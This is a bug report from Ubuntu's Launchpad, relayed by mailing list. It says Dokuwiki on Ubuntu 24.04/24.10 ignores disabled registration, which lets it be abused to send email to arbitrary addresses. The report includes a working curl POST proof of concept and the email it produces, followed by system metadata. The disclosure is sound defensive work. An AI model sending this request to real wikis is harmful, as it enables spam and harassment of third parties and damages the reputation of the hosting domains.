Public bug reported: Dokuwiki 0.0.20220731.a-2 in 24.04 and 24.10 has a serious bug.
It should be possible to completely disable registration and password reset with this line in local.php: `$conf['disableactions'] = 'register,resendpwd'`. Indeed this works for normal web access. However, there is bug with this code and it is being actively exploited. The the following request results in an email sent to the email address provided. ``` curl -d "login=BADBUG&fullname=FUBAR&email=tar...@attack.com&save=1§ok=" -H 'Content-Type: application/x-www-form-urlencoded' -X POST 'https://dokuwiki.example.com/doku.php?id=start&do=register' ``` sends an email to the supplied attack address with content: ``` Hi FUBAR! Here is your userdata for Debian DokuWiki at https://dokuwiki.example.com/ Login : badbug Password : ducversao+60 -- This mail was generated by DokuWiki at https://dokuwiki.example.com/ ``` This can be used to anonymously attack a given email address, or trash the reputation of a domain that is running the Ubuntu version of Dokuwiki. The dokuwiki maintainers have tested this vulnerability and report that it has been fixed for a while. References: https://forum.dokuwiki.org/d/22878-dokuwiki-used-to-relay-spam https://github.com/dokuwiki/dokuwiki/issues/4407 ProblemType: Bug DistroRelease: Ubuntu 24.10 Package: dokuwiki 0.0.20220731.a-2 [modified: usr/share/dokuwiki/inc/template.php var/lib/dokuwiki/lib/plugins/config/_test/WriterTest.php var/lib/dokuwiki/lib/plugins/config/core/Setting/Setting.php var/lib/dokuwiki/lib/plugins/config/core/Setting/SettingArray.php var/lib/dokuwiki/lib/plugins/config/core/Writer.php var/lib/dokuwiki/lib/tpl/dokuwiki/tpl_footer.php var/lib/dokuwiki/lib/tpl/dokuwiki/tpl_header.php] ProcVersionSignature: Ubuntu 6.11.0-1009.10-aws 6.11.11 Uname: Linux 6.11.0-1009-aws x86_64 ApportVersion: 2.30.0-0ubuntu4 Architecture: amd64 CasperMD5CheckResult: unknown CloudArchitecture: x86_64 CloudBuildName: server CloudID: aws CloudName: aws CloudPlatform: ec2 CloudRegion: eu-north-1 CloudSerial: 20240927 CloudSubPlatform: metadata (http://169.254.169.254) Date: Mon Feb 24 14:31:11 2025 Ec2Architecture: x86_64 Ec2Imageid: ami-08eb150f611ca277f Ec2Instancetype: t3.micro Ec2Region: eu-north-1 PackageArchitecture: all ProcEnviron: LANG=C.UTF-8 PATH=(custom, no user) SHELL=/bin/bash TERM=xterm-256color SourcePackage: dokuwiki UpgradeStatus: Upgraded to oracular on 2025-02-24 (0 days ago) ** Affects: dokuwiki (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug cloud-image oracular -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/2099903 Title: dokuwiki sends emails to arbitrary email addresses To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dokuwiki/+bug/2099903/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
